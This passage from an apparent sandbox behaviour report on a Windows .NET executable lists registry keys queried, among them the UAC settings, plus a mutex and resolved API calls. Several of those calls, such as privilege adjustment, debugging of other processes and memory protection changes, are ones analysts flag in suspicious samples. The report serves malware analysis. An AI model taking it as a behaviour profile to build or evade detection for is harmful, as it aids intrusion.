HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\Config\ServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\CLResolutionInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\DisplayInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\SkipWatson
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\Settings\ReflectionInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System\USER32\ProviderGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ChannelAccess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ChannelAccess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ChannelAccess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{f19f064d-082c-4e27-bc73-6882a1bb8e4c},0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}\Properties\{f19f064d-082c-4e27-bc73-6882a1bb8e4c},0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}\Properties\{f19f064d-082c-4e27-bc73-6882a1bb8e4c},0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ChannelAccess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{e4870e26-3cc5-4cd2-ba46-ca0a9a70ed04},0
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\SymbolicLinkValue
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\SymbolicLinkValue
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\SymbolicLinkValue
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\7a586aef_0\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\FxProperties\{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\FxProperties\{d04e05a6-594b-4fb6-a80d-01af5eed7d1d},1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\FriendlyName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\Copyright
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\MajorVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\MinorVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\MinInputConnections
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\MaxInputConnections
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\MinOutputConnections
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\MaxOutputConnections
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\MaxInstances
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\APOInterface0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{e4870e26-3cc5-4cd2-ba46-ca0a9a70ed04},1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{e4870e26-3cc5-4cd2-ba46-ca0a9a70ed04},4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\FxProperties\{d04e05a6-594b-4fb6-a80d-01af5eed7d1d},2
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\FriendlyName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\Copyright
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\MajorVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\MinorVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\MinInputConnections
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\MaxInputConnections
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\MinOutputConnections
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\MaxOutputConnections
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\MaxInstances
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\APOInterface0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Audio\AudioDGInactiveTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DiskDiagnostics\DFDCollectorInvokeTimes
Write Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DiskDiagnostics\DFDCollectorInvokeTimes
Delete Keys
Nothing to display
Mutexes
Global\CLR_CASOFF_MUTEX D448845E628773E4A9A809DA
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName kernel32.dll.IsValidLocaleName kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW kernel32.dll.InitializeCriticalSectionAndSpinCount kernel32.dll.IsProcessorFeaturePresent msvcrt.dll._set_error_mode msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z kernel32.dll.FindActCtxSectionStringW kernel32.dll.GetSystemWindowsDirectoryW mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap mscorwks.dll._CorExeMain mscorwks.dll.GetCLRFunction advapi32.dll.RegisterTraceGuidsW advapi32.dll.UnregisterTraceGuids advapi32.dll.GetTraceLoggerHandle advapi32.dll.GetTraceEnableLevel advapi32.dll.GetTraceEnableFlags advapi32.dll.TraceEvent mscoree.dll.IEE mscoreei.dll.IEE mscorwks.dll.IEE mscoree.dll.GetStartupFlags mscoreei.dll.GetStartupFlags mscoree.dll.GetHostConfigurationFile mscoreei.dll.GetHostConfigurationFile mscoreei.dll.GetCORVersion mscoree.dll.GetCORSystemDirectory mscoreei.dll.GetCORSystemDirectory_RetAddr mscoreei.dll.CreateConfigStream ntdll.dll.RtlUnwind kernel32.dll.IsWow64Process advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddVectoredContinueHandler kernel32.dll.RemoveVectoredContinueHandler advapi32.dll.ConvertSidToStringSidW shell32.dll.SHGetFolderPathW kernel32.dll.GetWriteWatch kernel32.dll.ResetWriteWatch kernel32.dll.CreateMemoryResourceNotification kernel32.dll.QueryMemoryResourceNotification kernel32.dll.QueryActCtxW kernel32.dll.GetVersionExW kernel32.dll.GetFullPathNameW ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 ole32.dll.CoGetContextToken advapi32.dll.CryptAcquireContextA advapi32.dll.CryptReleaseContext advapi32.dll.CryptCreateHash advapi32.dll.CryptDestroyHash advapi32.dll.CryptHashData advapi32.dll.CryptGetHashParam advapi32.dll.CryptImportKey advapi32.dll.CryptExportKey advapi32.dll.CryptGenKey advapi32.dll.CryptGetKeyParam advapi32.dll.CryptDestroyKey advapi32.dll.CryptVerifySignatureA advapi32.dll.CryptSignHashA advapi32.dll.CryptGetProvParam advapi32.dll.CryptGetUserKey advapi32.dll.CryptEnumProvidersA mscoree.dll.GetMetaDataInternalInterface mscoreei.dll.GetMetaDataInternalInterface mscorwks.dll.GetMetaDataInternalInterface mscorjit.dll.getJit kernel32.dll.GetUserDefaultUILanguage kernel32.dll.SetErrorMode kernel32.dll.GetFileAttributesExW mscoreei.dll.LoadLibraryShim culture.dll.ConvertLangIdToCultureName kernel32.dll.lstrlen kernel32.dll.lstrlenW mscoree.dll.ND_RI4 mscoreei.dll.ND_RI4 kernel32.dll.VirtualProtect kernel32.dll.GlobalMemoryStatusEx kernel32.dll.GetEnvironmentVariableW kernel32.dll.SwitchToThread kernel32.dll.CloseHandle kernel32.dll.GetCurrentProcessId advapi32.dll.LookupPrivilegeValueW kernel32.dll.GetCurrentProcess advapi32.dll.AdjustTokenPrivileges kernel32.dll.OpenProcess psapi.dll.EnumProcessModules psapi.dll.GetModuleInformation psapi.dll.GetModuleBaseNameW psapi.dll.GetModuleFileNameExW kernel32.dll.GetProcAddress kernel32.dll.DebugActiveProcess kernel32.dll.WaitForDebugEvent kernel32.dll.ContinueDebugEvent kernel32.dll.DeleteFileA advapi32.dll.SetKernelObjectSecurity advapi32.dll.GetKernelObjectSecurity ntdll.dll.NtSetInformationProcess 